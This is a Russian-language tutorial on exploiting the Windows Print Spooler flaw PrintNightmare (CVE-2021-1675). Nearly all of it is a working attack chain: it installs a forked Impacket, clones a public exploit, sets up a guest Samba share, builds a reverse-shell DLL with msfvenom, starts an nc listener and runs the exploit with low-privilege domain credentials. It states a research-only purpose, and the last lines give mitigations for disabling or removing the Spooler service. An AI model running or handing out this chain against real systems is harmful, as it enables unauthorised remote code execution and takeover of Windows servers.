Print Nightmare (CVE-2021-1675) эксплуатация и защита
Данный материал предназначен только для исследования уязвимости и построения своевременной защиты.
Уязвимость Spooler позволяет удаленно или локально запускать вредоносную dll для эксплуатации нужны учетные данные пользователя с минимальными привилегиями, патч выпущенный Microsoft не закрывает уязвимость.
Используемые ОС:
Windows Server 2019
Parrot linux
Подготовка
Для успешного запуска exploit понадобится python3 с установленной библиотекой Impacket
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py installСкачиваем exploit
git clone https://github.com/cube0x0/CVE-2021-1675.git
Запускаем exploit и получаем вывод с параметрами запуска
python3 CVE-2021-1675.py
usage: CVE-2021-1675.py [-h] [-hashes LMHASH:NTHASH] [-target-ip ip address] [-port [destination port]] target share
CVE-2021-1675 implementation.
positional arguments:
target [[domain/]username[:password]@]<targetName or address>
share Path to DLL. Example '\\10.10.10.10\share\evil.dll'
optional arguments:
-h, --help show this help message and exit
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
connection:
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name
and you cannot resolve it
-port [destination port]
Destination port to connect to SMB Server
Example;
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll'Так же для эксплуатации понадобится SMB без авторизации
cd /etc/samba/
mv smb.conf smb.conf.backКонфигурация smb.conf
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
[smb]
comment = Samba
path = /Ozali/
guest ok = yes
read only = no
browsable = yesПерезапускаем службу после изменения конфигурации
service smbd restart Для определения уязвимых хостов можно использовать rpcdump.py из библиотеки Impacket
Пример:
rpcdump.py @192.168.1.10 | grep MS-RPRN
Protocol: [MS-RPRN]: Print System Remote ProtocolСоздаем reverse shell dll для тестирования exploit в папке с открытым доступом SMB
msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=192.168.1.37 LPORT=443 -o hackerr.dll
После обращения к вредоносной dll на скомпрометированном сервере будет открыто reverse shell подключение, для этого на своем Parrot будем слушать порт 443 и ожидать подключения
nc -lvp 443Эксплуатация
python3 /tmp/CVE-2021-1675/CVE-2021-1675.py ozali.lowpriv:Pass123@192.168.1.10 '\\192.168.1.37\smb\hacker.dll'

В качестве временного закрытия уязвимости можно отключить службу spooler
Stop-Service Spooler
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /fИли удалить службу принтеров
Uninstall-WindowsFeature Print-Services